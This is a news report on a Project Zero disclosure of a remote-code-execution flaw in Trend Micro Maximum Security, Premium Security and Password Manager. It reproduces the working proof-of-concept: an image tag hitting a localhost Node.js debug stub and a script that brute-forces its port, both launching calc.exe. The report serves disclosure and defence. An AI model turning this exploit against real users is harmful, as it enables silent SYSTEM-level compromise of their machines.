Tavis Ormandy of Google Project Zero has revealed details of a critical vulnerability in Trend Micro antivirus products that can lead to remote compromise of the vulnerable system.
The following products are vulnerable:
- Trend Micro Maximum Security
- Trend Micro Premium Security
- Trend Micro Password Manager
The vulnerability is caused by a Node.js debugging stub that the products run on localhost by default. Any web page the victim opens can make the victim's browser send requests to that stub, so a remote, unauthenticated attacker can execute arbitrary commands on the vulnerable system with SYSTEM privileges.
To exploit the vulnerability, the victim only has to visit a specially crafted website. The proof-of-concept, which launches calc.exe (the Windows calculator), is a single image tag; the page cannot read the response, but the browser still sends the GET request to the stub:
<img src="http://localhost:40000/json/new/?javascript:require('child_process').spawnSync('calc.exe')">
The port on which Node.js listens can be changed by the application, so the attacker has to brute-force it. The browser can do that for the attacker: the following script creates an image element for each candidate port, 128 at a time, and moves on to the next port as soon as a request completes (the onerror handler is needed as well, because the response is never a valid image):
<script>
var port = 49152;       // first port to try (start of the Windows ephemeral range)
var maxport = 60000;    // stop here
var concurrent = 128;   // number of requests kept in flight at once

function nextPort()
{
    var img = document.createElement('IMG');

    img.alt = "Testing " + port + "...";
    img.src = "http://127.0.0.1:"
            + port++
            + "/json/new/?"
            + "javascript:require('child_process')"
            + ".spawnSync('calc.exe')";

    // Whether the request succeeded or failed, free the element and try the next port.
    img.onload = img.onerror = function(e) {
        document.body.removeChild(e.target);
        nextPort();
    }

    if (port < maxport) {
        document.body.appendChild(img);
    }
}

for (i = 0; i < concurrent; i++)
    nextPort();
</script>
Trend Micro has reportedly issued a temporary fix for this vulnerability.
A similar vulnerability was discovered in the Password Manager component this January.